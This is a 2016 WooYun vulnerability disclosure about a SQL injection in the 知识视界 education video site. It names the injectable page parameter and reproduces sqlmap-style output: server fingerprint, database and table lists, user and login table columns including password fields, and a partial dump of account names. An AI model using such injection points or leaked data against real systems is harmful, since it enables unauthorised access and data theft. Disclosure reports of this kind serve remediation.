当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168698

漏洞标题:知识视界存在sql注入漏洞,泄露大量数据信息

相关厂商:知识视界

漏洞作者: dloved

提交时间:2016-01-12 19:24

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-12: 细节已通知厂商并且等待厂商处理中
2016-01-15: 厂商已经确认,细节仅向厂商公开
2016-01-25: 细节向核心白帽子及相关领域专家公开
2016-02-04: 细节向普通白帽子公开
2016-02-14: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

知识视界存在sql注入漏洞,泄露大量数据信息

详细说明:

url:http://**.**.**.**/
注入点:

http://**.**.**.**/danpian/danpian.aspx?id=11328


数据库类型:

web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


获得上百个数据库表:
Database: Englishlearning
[45 tables]
+---------------------------------------------------+
| Attention |
| Collections |
| ExtendedReadingAddNews |
| ExtendedReadingAddNews |
| Leadin |
| Praise |
| Ques |
| QuesUser |
| Schedule |
| TeacherRole |
| TopicDetails |
| TopicDetails |
| TopicDetailsTwo |
| Track |
| Tsys_ADClass |
| Tsys_ADClass |
| Tsys_ADView |
| UserClassroom |
| Vocabulary |
| Years |
| days |
| isLoginJilu |
| keyswordList |
| moon |
| tsys_Author |
| tsys_Class |
| tsys_DynamicInsert |
| tsys_From |
| tsys_Menu |
| tsys_News |
| tsys_OperatingRecord |
| tsys_PageContentInsert |
| tsys_ResPaging |
| tsys_Role |
| tsys_Speciality |
| tsys_StaticInsert |
| tsys_Template |
| tsys_User |
| userInfo |
| userRole |
| viManagerPermission |
| viManagerPermission |
| viTopicDetailsTwoUinfo |
| viTopicDetailsUinfo |
| viTsys_News |
+---------------------------------------------------+
Database: tempdb
[5 tables]
+---------------------------------------------------+
| #0157C189 |
| #53FAC478 |
| #55F20351 |
| #610B9B96 |
| #7D5120FC |
+---------------------------------------------------+
Database: zhishishijie_Media
[49 tables]
+---------------------------------------------------+
| BatchItemList |
| BatchList |
| CaptionList |
| ChannelInfo |
| HomePageStat |
| IPList |
| LibList |
| Member |
| MessageList |
| NewsCode |
| PackList |
| SchoolList |
| Sheet1$ |
| Tsys_ADClass |
| Tsys_ADClass |
| Tsys_ADView |
| VideoList |
| VideoQues |
| 'Twig Film nodes#csv$' |
| channel$ |
| downpart |
| lrc |
| packItemList |
| partVideoList |
| relate |
| scoreList |
| tsys_Author |
| tsys_Class |
| tsys_DynamicInsert |
| tsys_From |
| tsys_Import |
| tsys_Menu |
| tsys_News |
| tsys_OperatingRecord |
| tsys_ResPaging |
| tsys_Role |
| tsys_Speciality |
| tsys_StaticInsert |
| tsys_Template |
| tsys_User |
| v_MessageList |
| v_VideoQues |
| v_packitem |
| v_partvideo |
| viManagerPermission |
| viManagerPermission |
| viTsys_News |
| videoIPList |
| videoScore |
+---------------------------------------------------+
Database: zhishishijie_en
[61 tables]
+---------------------------------------------------+
| BigSite |
| Client |
| HomePageStat |
| IPListbak |
| IPListbak |
| Member |
| MessageList |
| Online |
| Origin_Page |
| PackList |
| SchoolList |
| Site |
| SysDict |
| Tsys_ADClass |
| Tsys_ADClass |
| Tsys_ADView |
| User_Address |
| VideoIPList |
| VideoList |
| View |
| address |
| captionlist2 |
| captionlist2 |
| codeid |
| danpian |
| downpart |
| dtproperties |
| lrc |
| partVideoList |
| relate |
| scoreList |
| spring2011 |
| tongbuen |
| tongbuen |
| tongbuold |
| tsys_Author |
| tsys_Class |
| tsys_DynamicInsert |
| tsys_From |
| tsys_Import |
| tsys_Menu |
| tsys_News2 |
| tsys_News2 |
| tsys_OperatingRecord |
| tsys_ResPaging |
| tsys_Role |
| tsys_Speciality |
| tsys_StaticInsert |
| tsys_Template |
| tsys_User |
| tsys_newsall |
| tsys_newsbak |
| v_MessageList |
| v_partvideo |
| v_videoIPList |
| v_videoNum |
| viManagerPermission |
| viManagerPermission |
| viTsys_News |
| videoScore |
| videodc |
+---------------------------------------------------+
Database: msdb
[92 tables]
+---------------------------------------------------+
| MSdatatype_mappings |
| MSdbms_datatype_mapping |
| MSdbms_datatype_mapping |
| MSdbms_datatype_mapping |
| MSdbms_map |
| backupfilegroup |
| backupfilegroup |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_monitor_alert |
| log_shipping_monitor_error_detail |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary |
| log_shipping_monitor_secondary |
| log_shipping_primaries |
| log_shipping_primary_databases |
| log_shipping_primary_secondaries |
| log_shipping_secondaries |
| log_shipping_secondary_databases |
| log_shipping_secondary_databases |
| logmarkhistory |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| suspect_pages |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysdatatypemappings |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtslog90 |
| sysdtspackagefolders90 |
| sysdtspackagelog |
| sysdtspackages90 |
| sysdtspackages90 |
| sysdtssteplog |
| sysdtstasklog |
| sysjobactivity |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobstepslogs |
| sysjobstepslogs |
| sysmail_account |
| sysmail_allitems |
| sysmail_attachments_transfer |
| sysmail_attachments_transfer |
| sysmail_configuration |
| sysmail_event_log |
| sysmail_faileditems |
| sysmail_log |
| sysmail_mailattachments |
| sysmail_mailitems |
| sysmail_principalprofile |
| sysmail_profileaccount |
| sysmail_profileaccount |
| sysmail_query_transfer |
| sysmail_send_retries |
| sysmail_sentitems |
| sysmail_server |
| sysmail_servertype |
| sysmail_unsentitems |
| sysmaintplan_logdetail |
| sysmaintplan_logdetail |
| sysmaintplan_plans |
| sysmaintplan_subplans |
| sysnotifications |
| sysoperators |
| sysoriginatingservers_view |
| sysoriginatingservers_view |
| sysproxies |
| sysproxylogin |
| sysproxyloginsubsystem_view |
| sysproxysubsystem |
| sysschedules_localserver_view |
| sysschedules_localserver_view |
| syssessions |
| syssubsystems |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
+---------------------------------------------------+
Database: lrcdb
[1 table]
+---------------------------------------------------+
| lrc |
+---------------------------------------------------+
Database: master
[290 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| **.**.**.**puted_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.credentials |
| sys.crypt_properties |
| sys.data_spaces |
| sys.database_files |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_db_file_space_usage |
| sys.dm_db_index_usage_stats |
| sys.dm_db_mirroring_connections |
| sys.dm_db_missing_index_details |
| sys.dm_db_missing_index_group_stats |
| sys.dm_db_missing_index_groups |
| sys.dm_db_partition_stats |
| sys.dm_db_session_space_usage |
| sys.dm_db_task_space_usage |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_cached_plans |
| sys.dm_exec_connections |
| sys.dm_exec_query_optimizer_info |
| sys.dm_exec_query_stats |
| sys.dm_exec_query_transformation_stats |
| sys.dm_exec_requests |
| sys.dm_exec_sessions |
| sys.dm_fts_active_catalogs |
| sys.dm_fts_index_population |
| sys.dm_fts_memory_buffers |
| sys.dm_fts_memory_pools |
| sys.dm_fts_population_ranges |
| sys.dm_io_backup_tapes |
| sys.dm_io_cluster_shared_drives |
| sys.dm_io_pending_io_requests |
| sys.dm_os_buffer_descriptors |
| sys.dm_os_child_instances |
| sys.dm_os_cluster_nodes |
| sys.dm_os_hosts |
| sys.dm_os_latch_stats |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.dm_os_memory_cache_clock_hands |
| sys.dm_os_memory_cache_counters |
| sys.dm_os_memory_cache_entries |
| sys.dm_os_memory_cache_hash_tables |
| sys.dm_os_memory_clerks |
| sys.dm_os_memory_objects |
| sys.dm_os_memory_pools |
| sys.dm_os_performance_counters |
| sys.dm_os_ring_buffers |
| sys.dm_os_schedulers |
| sys.dm_os_stacks |
| sys.dm_os_sublatches |
| sys.dm_os_sys_info |
| sys.dm_os_tasks |
| sys.dm_os_threads |
| sys.dm_os_virtual_address_dump |
| sys.dm_os_wait_stats |
| sys.dm_os_waiting_tasks |
| sys.dm_os_worker_local_storage |
| sys.dm_os_workers |
| sys.dm_qn_subscriptions |
| sys.dm_repl_articles |
| sys.dm_repl_schemas |
| sys.dm_repl_tranhash |
| sys.dm_repl_traninfo |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions |
| sys.dm_tran_current_snapshot |
| sys.dm_tran_current_transaction |
| sys.dm_tran_database_transactions |
| sys.dm_tran_locks |
| sys.dm_tran_session_transactions |
| sys.dm_tran_top_version_generators |
| sys.dm_tran_transactions_snapshot |
| sys.dm_tran_version_store |
| sys.endpoint_webmethods |
| sys.endpoints |
| sys.event_notification_event_types |
| sys.event_notifications |
| sys.events |
| sys.extended_procedures |
| sys.extended_properties |
| sys.filegroups |
| sys.foreign_key_columns |
| sys.foreign_keys |
| sys.fulltext_catalogs |
| sys.fulltext_document_types |
| sys.fulltext_index_catalog_usages |
| sys.fulltext_index_columns |
| sys.fulltext_indexes |
| sys.fulltext_languages |
| sys.http_endpoints |
| sys.identity_columns |
| sys.index_columns |
| sys.indexes |
| sys.internal_tables |
| sys.key_constraints |
| sys.key_encryptions |
| sys.linked_logins |
| sys.login_token |
| sys.master_files |
| sys.master_key_passwords |
| sys.message_type_xml_schema_collection_usages |
| sys.messages |
| sys.module_assembly_usages |
| sys.numbered_procedure_parameters |
| sys.numbered_procedures |
| sys.objects |
| sys.openkeys |
| sys.parameter_type_usages |
| sys.parameter_xml_schema_collection_usages |
| sys.parameters |
| sys.partition_functions |
| sys.partition_parameters |
| sys.partition_range_values |
| sys.partition_schemes |
| sys.partitions |
| sys.plan_guides |
| sys.procedures |
| sys.remote_logins |
| sys.remote_service_bindings |
| sys.routes |
| sys.schemas |
| sys.securable_classes |
| sys.server_assembly_modules |
| sys.server_event_notifications |
| sys.server_events |
| sys.server_permissions |
| sys.server_principals |
| sys.server_role_members |
| sys.server_sql_modules |
| sys.server_trigger_events |
| sys.server_triggers |
| sys.servers |
| sys.service_broker_endpoints |
| sys.service_contract_message_usages |
| sys.service_contract_usages |
| sys.service_contracts |
| sys.service_message_types |
| sys.service_queue_usages |
| sys.service_queues |
| sys.services |
| sys.soap_endpoints |
| sys.sql_dependencies |
| sys.sql_logins |
| sys.sql_modules |
| sys.stats_columns |
| sys.stats_columns |
| sys.symmetric_keys |
| sys.synonyms |
| sys.sysaltfiles |
| sys.syscacheobjects |
| sys.syscharsets |
| sys.syscolumns |
| sys.syscomments |
| sys.sysconfigures |
| sys.sysconstraints |
| sys.syscurconfigs |
| sys.syscursorcolumns |
| sys.syscursorrefs |
| sys.syscursors |
| sys.syscursortables |
| sys.sysdatabases |
| sys.sysdepends |
| sys.sysdevices |
| sys.sysfilegroups |
| sys.sysfiles |
| sys.sysforeignkeys |
| sys.sysfulltextcatalogs |
| sys.sysindexes |
| sys.sysindexkeys |
| sys.syslanguages |
| sys.syslockinfo |
| sys.syslogins |
| sys.sysmembers |
| sys.sysmessages |
| sys.sysobjects |
| sys.sysoledbusers |
| sys.sysopentapes |
| sys.sysperfinfo |
| sys.syspermissions |
| sys.sysprocesses |
| sys.sysprotects |
| sys.sysreferences |
| sys.sysremotelogins |
| sys.syssegments |
| sys.sysservers |
| sys.system_columns |
| sys.system_components_surface_area_configuration |
| sys.system_internals_allocation_units |
| sys.system_internals_partition_columns |
| sys.system_internals_partitions |
| sys.system_objects |
| sys.system_parameters |
| sys.system_sql_modules |
| sys.system_views |
| sys.systypes |
| sys.sysusers |
| sys.tables |
| sys.tcp_endpoints |
| sys.trace_categories |
| sys.trace_columns |
| sys.trace_event_bindings |
| sys.trace_events |
| sys.trace_subclass_values |
| sys.traces |
| sys.transmission_queue |
| sys.trigger_events |
| sys.triggers |
| sys.type_assembly_usages |
| sys.types |
| sys.user_token |
| sys.via_endpoints |
| sys.views |
| sys.xml_indexes |
| sys.xml_schema_attributes |
| sys.xml_schema_collections |
| sys.xml_schema_component_placements |
| sys.xml_schema_components |
| sys.xml_schema_elements |
| sys.xml_schema_facets |
| sys.xml_schema_model_groups |
| sys.xml_schema_namespaces |
| sys.xml_schema_types |
| sys.xml_schema_wildcard_namespaces |
| sys.xml_schema_wildcards |
+---------------------------------------------------+
Database: jiangxiangGT
[27 tables]
+---------------------------------------------------+
| PackList |
| Tsys_ADClass |
| Tsys_ADClass |
| Tsys_ADView |
| captionlist |
| keyswordList |
| lrc |
| packItemList |
| topicSumList |
| tsys_Author |
| tsys_Class |
| tsys_DynamicInsert |
| tsys_From |
| tsys_Menu |
| tsys_News |
| tsys_OperatingRecord |
| tsys_PageContentInsert |
| tsys_ResPaging |
| tsys_Role |
| tsys_Speciality |
| tsys_StaticInsert |
| tsys_Template |
| tsys_User |
| viManagerPermission |
| viManagerPermission |
| viTsys_News |
| videoIPList |
+---------------------------------------------------+
Database: zhishishijieflash_person
[226 tables]
+---------------------------------------------------+
| App_ActionCount |
| App_ClassType |
| App_Commend |
| App_Comment |
| App_Count |
| App_IndexCommend |
| App_School |
| App_SetUpID |
| App_Subject |
| App_SuggesTion |
| App_UserCountMakeUse |
| App_UserCountMakeUse |
| App_ads |
| App_down |
| App_relationVideo |
| App_tsysImg |
| App_videoCount |
| Applications |
| BatchItemList |
| BatchList |
| BigSite |
| ChannelInfo |
| Client |
| Eng_contestsPro |
| EnglishContest |
| Flat_AD |
| GG_Company |
| GG_tsysID |
| HomePageStat1 |
| HomePageStat1 |
| HomePageStat2 |
| HomePageStat3 |
| HomePageStat4 |
| IPList |
| LibList |
| Member |
| MessageList |
| Online |
| Origin_Page |
| Other_magazine |
| PE_Admin |
| PE_Adv |
| PE_BookType |
| PE_Class |
| PE_Comment |
| PE_Configure |
| PE_History |
| PE_InIndex |
| PE_IpCount |
| PE_KnowledgeType |
| PE_MyCollect |
| PE_OrderItem |
| PE_OrderItem |
| PE_ShortVideo1 |
| PE_ShortVideo1 |
| PE_Suggest |
| PE_Teacher1 |
| PE_Teacher1 |
| PE_Teacher2 |
| PE_Teacher3 |
| PE_Teacher4 |
| PE_TeacherNews |
| PE_Ticket |
| PackList |
| SchoolList |
| Site |
| SysDict |
| Temp_Fayi |
| Temp_captionlist |
| Temp_captionlist |
| Templrc |
| TopicSumUser |
| Tsys_ADClass |
| Tsys_ADClass |
| Tsys_ADView |
| User_Address |
| V_App_TsysNews |
| VideoList |
| View |
| ad_count |
| address |
| app_HotWord |
| app_ad |
| app_answer |
| app_result |
| captionlist2 |
| captionlist2 |
| captionlistbak |
| codeid |
| competitors10 |
| competitors10 |
| competitors10s |
| competitors11 |
| competitors12 |
| competitors13 |
| competitors14a |
| competitors14a |
| competitors15 |
| competitors16 |
| competitors2 |
| competitors3 |
| competitors4 |
| competitors6 |
| competitors6x |
| competitors7 |
| competitors9 |
| competitors9x |
| danpian |
| downpart1 |
| downpart1 |
| downpart2 |
| downpart3 |
| downpart4 |
| dv_AddPostRecord |
| dv_BookMark |
| dv_Commend |
| dv_NodeDTL |
| dv_NodeInfo |
| dv_UserMsg |
| dv_activity_convene |
| dv_activity_signup |
| dv_admin_menu |
| dv_admin_menu |
| dv_albumbbs |
| dv_albumbbs |
| dv_albumfav |
| dv_albumimg |
| dv_albumtype |
| dv_appraiseindex |
| dv_appraiseindex |
| dv_bbs1 |
| dv_bbsnews |
| dv_board_ads |
| dv_board_ads |
| dv_board_role |
| dv_class |
| dv_consume |
| dv_custom_tpl_label_files |
| dv_custom_tpl_label_files |
| dv_exexp |
| dv_friend |
| dv_fsetting |
| dv_group_Name |
| dv_group_bbs |
| dv_group_board |
| dv_group_topic |
| dv_group_type |
| dv_group_user |
| dv_help |
| dv_inviteCode |
| dv_inviteRegsetting |
| dv_keyword |
| dv_log |
| dv_medal |
| dv_message |
| dv_online |
| dv_pkbet |
| dv_postsigned |
| dv_procounter |
| dv_procredit |
| dv_product |
| dv_prostore |
| dv_protrade |
| dv_refuseip |
| dv_reward |
| dv_robotsadvent |
| dv_role |
| dv_setup |
| dv_stats |
| dv_tablelist |
| dv_topic_index_elite |
| dv_topic_index_elite |
| dv_topic_index_elite |
| dv_topic_index_special |
| dv_topic_index_topped |
| dv_upfile |
| dv_usergroups |
| dv_usergroups |
| dv_vote |
| dv_voteuser |
| lrc |
| packItemList |
| partVideoList |
| relate |
| scoreList |
| spring2011 |
| tongbu |
| topicRef |
| topicSum |
| topicSumShaoolType |
| topicSumvideoIPList |
| tsys_Author |
| tsys_Class |
| tsys_DynamicInsert |
| tsys_From |
| tsys_Import |
| tsys_Menu |
| tsys_OperatingRecord |
| tsys_ResPaging |
| tsys_Role |
| tsys_Speciality |
| tsys_StaticInsert |
| tsys_Template |
| tsys_User |
| tsys_newsbak |
| tsys_newsbak |
| v_App_Count |
| v_MessageList |
| v_packitem |
| v_partvideo |
| v_videoIPList1 |
| v_videoIPList1 |
| v_videoNum |
| viLiblist |
| viManagerPermission |
| viManagerPermission |
| viTempTsys_News |
| viTsys_News |
| videoIPList1 |
| videoIPList1 |
| videoIPList2 |
| videoIPList3 |
| videoIPList4 |
| videoScore |
| videoUserList |
| videodc |
+---------------------------------------------------+
Database: shaoer_gt
[48 tables]
+---------------------------------------------------+
| BigSite |
| CaptionList |
| ChannelInfo |
| Client |
| IPList |
| Member |
| MessageList |
| Online |
| Origin_Page |
| PackList |
| SchoolList |
| Site |
| SysDict |
| Tsys_ADClass |
| Tsys_ADClass |
| Tsys_ADView |
| User_Address |
| VideoIPList |
| VideoList |
| View |
| address |
| danpian |
| lrc |
| partVideoList |
| relate |
| spring2011 |
| tongbu |
| tsys_Author |
| tsys_Class |
| tsys_DynamicInsert |
| tsys_From |
| tsys_Import |
| tsys_Menu |
| tsys_News |
| tsys_OperatingRecord |
| tsys_ResPaging |
| tsys_Role |
| tsys_Speciality |
| tsys_StaticInsert |
| tsys_Template |
| tsys_User |
| v_partvideo |
| v_videoIPList |
| v_videoNum |
| viManagerPermission |
| viManagerPermission |
| viTsys_News |
| videodc |
+---------------------------------------------------+
Database: zhishishijie_German
[36 tables]
+---------------------------------------------------+
| BatchItemList |
| BatchList |
| IPList |
| Member |
| PackList |
| SchoolList |
| Tsys_ADClass |
| Tsys_ADClass |
| Tsys_ADView |
| VideoList |
| downpart |
| keyswordList |
| lrc |
| packItemList |
| partVideoList |
| proList |
| tsys_Author |
| tsys_Class |
| tsys_DynamicInsert |
| tsys_From |
| tsys_Import |
| tsys_Menu |
| tsys_News |
| tsys_OperatingRecord |
| tsys_ResPaging |
| tsys_Role |
| tsys_Speciality |
| tsys_StaticInsert |
| tsys_Template |
| tsys_User |
| v_packitem |
| viManagerPermission |
| viManagerPermission |
| viTsys_News |
| videoIPList |
| videoScore |
+---------------------------------------------------+
获得数据库字段:

Database: zhishishijieflash
Table: tsys_User
[12 columns]
+---------------+-----------+
| Column | Type |
+---------------+-----------+
| _MASK_FROM_V2 | timestamp |
| _MASK_TO_V2 | binary |
| AddTime | datetime |
| ID | int |
| IsLock | bit |
| LastLogTime | datetime |
| LogCount | int |
| LogTime | datetime |
| Name | varchar |
| NickName | varchar |
| Password | varchar |
| RoleID | int |
+---------------+-----------+
Database: zhishishijieflash
Table: sys.syslogins
[28 columns]
+---------------+
| Column |
+---------------+
| accdate |
| bulkadmin |
| createdate |
| dbcreator |
| dbname |
| denylogin |
| diskadmin |
| hasaccess |
| isntgroup |
| isntname |
| isntuser |
| language |
| loginname |
| name |
| password |
| processadmin |
| resultlimit |
| securityadmin |
| serveradmin |
| setupadmin |
| sid |
| spacelimit |
| status |
| sysadmin |
| timelimit |
| totcpu |
| totio |
| updatedate |
+---------------+


获得字段内容:
<code>web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: zhishishijieflash
Table: tsys_User
[895 entries]
+-------------------+
| Name |
+-------------------+
| admin |
| 阿盟电大 |
| 安徽财经大学 |
| 安徽大学 |
| 安徽工程大学 |
| 安徽工业大学 |
| 安徽国际商务职院 |
| 安徽建筑工业学院 |
| 安徽科技学院 |
| 安徽农业大学 |
| 安徽三联学院 |
| 安徽省党校 |
| 安徽省图书馆 |
| 安徽师范大学 |
| 安徽外国语学院 |
| 安徽新华学院 |
| 安徽医科大学 |
| 安徽中澳科技学院 |
| 安徽中医学院 |
| 安康学院 |
| 安庆师范学院 |
| 安庆市图书馆 |
| 安阳工学院 |
| 巴盟电大 |
| 白银市图书馆 |
| 百色学院 |
| 蚌埠学院 |
| 蚌埠医学院 |
| 包头电大 |
| 宝鸡市图书馆 |
| 宝鸡文理学院 |
| 保定市图书馆 |
| 北碚市图书馆 |
| 北方工业大学 |
| 北方民族大学 |
| 北海市图书馆 |
| 北华大学 |
| 北京城市学院 |
| 北京大学 |
| 北京第二外国语学院 |
| 北京电影学院 |
| 北京电子科技学院 |
| 北京电子科技职业学院 |
| 北京服装学院 |
| 北京工商大学 |
| 北京工业大学 |
| 北京工业大学实验学院 |
| 北京工业职业技术学院 |
| 北京航空航天大学 |
| 北京化工大学 |
| 北京吉利大学 |
| 北京建筑大学 |
| 北京科技大学 |
| 北京科技大学天津学院 |
| 北京理工大学 |
| 北京联合大学 |
| 北京林业大学 |
| 北京农学院 |
| 北京师范大学 |
| 北京石油化工学院 |
| 北京市东城区图书馆 |
| 北京体育大学 |
| 北京外国语大学 |
| 北京舞蹈学院 |
| 北京物资学院 |
| 北京信息科技大学 |
| 北京邮电大学 |
| 北京语言大学 |
| 滨州学院 |
| 渤海大学 |
| 沧州图书馆 |
| 昌吉学院 |
| 长安大学 |
| 长春工程学院 |
| 长春工业大学 |
| 长春建筑学院 |
| 长春理工大学 |
| 长春师范学院 |
| 长春中医药大学 |
| 长江大学 |
| 长江职业学院 |
| 长沙民政职业技术学院 |
| 长沙市图书馆 |
| 长沙学院 |
| 常州大学 |
| 常州工程职业技术学院 |
| 常州工学院 |
| 常州机电职业技术学院 |
| 常州轻工职业技术学院 |
| 常州图书馆 |
| 常州信息职业技术学院 |
| 巢湖学院 |
| 郴州市图书馆 |
| 成都大学 |
| 成都理工大学 |
| 成都信息工程学院 |
| 成都中医药大学 |
| 池州学院 |
| 赤峰电大 |
| 滁州学院 |
| 楚雄师范学院 |
| 大理大学 |
| 大连工业大学 |
| 大连海事大学 |
| 大连海洋大学 |
| 大连理工大学 |
| 大连市少儿图书馆 |
| 大连市图书馆 |
| 大连外国语学院 |
| 大连医科大学 |
| 大同市图书馆 |
| 大兴安岭电大 |
| 大雁电大 |
| 德州学院 |
| 第四军医大 |
| 电子科技大学 |
| 东北大学 |
| 东北电力大学 |
| 东北林业大学 |
| 东北农业大学 |
| 东北师范大学 |
| 东北石油大学 |
| 东华大学 |
| 东华理工大学 |
| 东莞理工学院 |
| 东莞市图书馆 |
| 对外经济贸易大学 |
| 鄂尔多斯电大 |
| 鄂尔多斯市图书馆 |
| 鄂州市图书馆 |
| 佛山禅城区图书馆 |
| 佛山市图书馆 |
| 佛山图书馆 |
| 涪陵区图书馆 |
| 福建电大 |
| 福建工程学院 |
| 福建南平市图书馆 |
| 福建农林大学 |
| 福建省图书馆 |
| 福建师范大学 |
| 福建医科大学 |
| 福建中医药大学 |
| 福州大学 |
| 福州外语外贸学院 |
| 抚州市图书馆 |
| 复旦大学 |
| 甘肃电大 |
| 甘肃民族师范学院 |
| 甘肃农业大学 |
| 甘肃省图书馆 |
| 甘肃政法学院 |
| 甘肃中医学院 |
| 赣南师范学院 |
| 根河电大 |
| 广安市邓小平图书馆 |
| 广东财经大学 |
| 广东第二师范学院 |
| 广东工程职业技术学院 |
| 广东工贸职业技术学院 |
| 广东工业大学 |
| 广东海洋大学图书馆 |
| 广东机电职业技术学院 |
| 广东技术师范学校 |
| 广东交通职业技术学院 |
| 广东培正学院 |
| 广东轻工职业技术学院 |
| 广东省广播电视大学 |
| 广东省中山图书馆 |
| 广东石油化工学院 |
| 广东外语外贸大学 |
| 广东外语艺术职业学院 |
| 广东药学院 |
| 广东医学院 |
| 广东中山图书馆 |
| 广西大学 |
| 广西工学院 |
| 广西机电职业技术学院 |
| 广西科技图书馆 |
| 广西民族大学 |
| 广西民族师范学院 |
| 广西师范大学 |
| 广西师范学院 |
| 广西医科大学 |
| 广西中医药大学 |
| 广西壮族自治区桂林图书馆 |
| 广西壮族自治区图书馆 |
| 广州白云学院 |
| 广州城市职业学院 |
| 广州大学 |
| 广州航海学院 |
| 广州美术学院 |
| 广州少年儿童图书馆 |
| 广州医科大学 |
| 广州中医药大学 |
| 贵阳市图书馆 |
| 贵阳学院 |
| 贵阳中医学院 |
| 贵州财经大学 |
| 贵州大学 |
| 贵州师范大学 |
| 贵州师范学院 |
| 桂林电子科技大学 |
| 桂林航天工业学院 |
| 桂林理工大学 |
| 国防科技大学 |
| 国家开放大学图书馆 |
| 哈尔滨工业大学 |
| 哈尔滨商业大学 |
| 哈尔滨师范大学 |
| 哈尔滨医科大学 |
| 海口经济学院 |
| 海南大学 |
| 海南师范大学 |
| 海南医学院 |
| 杭州电子科技大学 |
| 杭州广播电视大学 |
| 杭州师范大学 |
| 合肥财经学院 |
| 合肥工业大学 |
| 合肥师范学院 |
| 合肥市党校 |
| 合肥学院 |
| 河北大学 |
| 河北工程大学 |
| 河北工业大学 |
| 河北经贸大学 |
| 河北科技大学 |
| 河北联合大学 |
| 河北农业大学 |
| 河北医科大学 |
| 河南财经政法大学 |
| 河南城建学院 |
| 河南大学 |
| 河南工业大学 |
| 河南黄淮学院 |
| 河南机电高等专科学校 |
| 河南科技大学 |
| 河南农业大学 |
| 河南省图书馆 |
| 河南师范大学 |
| 河西学院 |
| 河源职业技术学院 |
| 菏泽学院 |
| 贺州学院 |
| 鹤壁市图书馆 |
| 黑龙江八一农垦大学 |
| 黑龙江大学 |
| 黑龙江工程学院 |
| 黑龙江中医药大学 |
| 呼市电大 |
| 湖北大学 |
| 湖北第二师范学院 |
| 湖北工程学院 |
| 湖北工业大学 |
| 湖北工业职业技术学院 |
| 湖北经济学院 |
| 湖北警官学院 |
| 湖北科技学院 |
| 湖北理工学院 |
| 湖北民族学院 |
| 湖北汽车工业学院 |
| 湖北省社会科学院 |
| 湖北省图书馆 |
| 湖北师范学院 |
| 湖北文理学院 |
| 湖北医药学院 |
| 湖北职业技术学院 |
| 湖北中医学院 |
| 湖北中医药高等专科学校 |
| 湖南第一师范 |
| 湖南工学院 |
| 湖南广播电视大学 |
| 湖南科技大学 |
| 湖南农业大学 |
| 湖南商学院 |
| 湖南省图书馆 |
| 湖南省委党校湖南行政学院 |
| 湖南师范大学 |
| 湖南中医药大学 |
| 湖州区图书馆 |
| 湖州师范学院 |
| 华北电力大学 |
| 华北水利水电学院 |
| 华东交通大学 |
| 华东理工大学 |
| 华东师范大学 |
| 华东政法大学 |
| 华南理工大学 |
| 华南农业大学 |
| 华南师范大学 |
| 华中科技大学 |
